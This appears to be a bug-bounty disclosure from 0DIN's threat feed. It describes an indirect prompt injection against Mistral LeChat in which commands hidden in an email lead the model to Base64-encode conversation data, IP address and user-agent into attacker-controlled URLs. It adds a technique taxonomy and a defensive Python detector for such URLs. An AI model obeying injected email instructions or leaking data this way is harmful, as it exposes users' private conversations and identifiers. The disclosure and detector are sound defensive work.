Mistral LeChat Data Exfiltration via Email Embedded Indirect Prompt Injection

Case GUID: f80b23c1-26cb-4484-8ea2-0e7a82867931

Summary

An indirect prompt injection vulnerability has been discovered affecting Mistral LeChat. The flaw exploits the model's instruction processing by embedding malicious commands within an email sent to a victim, leveraging LeChat's email capabilities. Base64 encoding is used to exfiltrate conversation data and network identifiers (i.e., IP address, browser user-agent) to attacker-controlled URLs.
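
As an added example (not 0DIN's or Mistral's code, and not the reported prompt), the Python below shows one defensive check for the pattern the summary describes: it scans assistant output for URLs to non-allowlisted hosts whose path segments or query values decode from Base64 to readable text. It assumes output can be inspected before links are rendered or fetched; the allowlist, host names, length and printable-ratio thresholds, and sample text are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"docs.example.com"}  # assumption: hosts this deployment may link to
URL_RE = re.compile(r"https?://[^\s)\]>\"']+")
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")  # standard or URL-safe alphabet


def decode_if_base64(token: str):
    """Return the decoded text if token is Base64 of mostly printable UTF-8, else None."""
    if not B64_RE.match(token):
        return None
    body = token.rstrip("=").replace("+", "-").replace("/", "_")
    try:
        text = base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)).decode("utf-8")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None
    printable = sum(ch.isprintable() or ch.isspace() for ch in text)
    return text if text and printable / len(text) >= 0.9 else None


def find_exfil_urls(model_output: str) -> list:
    """Flag URLs to non-allowlisted hosts that carry decodable Base64 text."""
    findings = []
    for url in URL_RE.findall(model_output):
        parts = urlsplit(url)
        if parts.hostname in ALLOWED_HOSTS:
            continue
        # Candidate carriers: path segments and query values ('+' kept literal).
        tokens = [seg for seg in parts.path.split("/") if seg]
        tokens += [unquote(p.partition("=")[2]) for p in parts.query.split("&")]
        for token in tokens:
            decoded = decode_if_base64(token)
            if decoded is not None:
                findings.append({"url": url, "host": parts.hostname, "decoded": decoded})
                break
    return findings

# Constructed sample: one benign link and one link carrying Base64 of made-up chat text.
SAMPLE_OUTPUT = (
    "See https://docs.example.com/guide?page=2 and "
    "![status](https://collector.example.net/p.png?d="
    + base64.b64encode(b"user asked about invoice 4471").decode() + ")"
)

if __name__ == "__main__":
    print(find_exfil_urls(SAMPLE_OUTPUT))
```

This is a heuristic: long tokens that happen to decode cleanly can produce false positives, so it works best paired with a strict link and image host allowlist.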

This disclosure is part of the 0DIN Threat Feed.

Metadata

Social Impact Score

Level 1: Minimal Risk

The violation poses very low societal risk, limited primarily to nuisance or minor policy breaches. Impact is contained, affecting individual users without broader implications.

Example: Circumventing minor content filters for benign content, such as inappropriate language filters in non-public conversations.

Potential Consequences: Limited harm, potentially reputational for the AI provider.

Taxonomies

Stratagems
This involves clever and unorthodox tactics designed to deceive the model, often requiring an understanding of its operational mechanics to achieve desired outcomes.
Meta Prompting
This technique focuses on manipulating the prompting process itself to influence the model's behavior and responses, often by employing higher-level prompting strategies.
Deceptive Formatting
A prompt injection in the purest sense: the user prompt is formatted to fabricate the appearance of system instructions, a database query, the model's own prediction, or some other source of input a guardrailed AI system might be expecting, causing it to behave in insecure ways based on the fabricated context from an adversarially formatted user prompt.
Language
This category focuses on the use of specific linguistic techniques, such as prompt injection or stylization, to influence the model's output.
Code and Encode
This strategy encompasses techniques that utilize various coding methods, such as Base64 or ROT13, to bypass model restrictions and manipulate outputs.
Base64
This technique involves encoding data into a Base64 format, which is a method of converting binary data into an ASCII string format. This technique can be used to bypass certain content filters or restrictions imposed by language models. By encoding prompts or payloads in Base64, users can potentially manipulate the model's responses or access information that may be restricted in its original form. This method leverages the model's ability to decode and interpret the encoded data, allowing for creative and strategic interactions.

About 0Din.ai

The 0Day Investigative Network (0DIN) was founded by Mozilla in 2024 to reward responsible researchers for their efforts in securing GenAI models. Learn more and submit discoveries at https://0din.ai.

This vulnerability was discovered through 0DIN's bug bounty program.

Severity

Low

Security Boundary

Guardrail Jailbreak

Models

Mistral: Mistral Large

Disclosed On

2025-08-27 (7 months)

Published On

2026-03-05 (13 days)

Credit

neuroXploit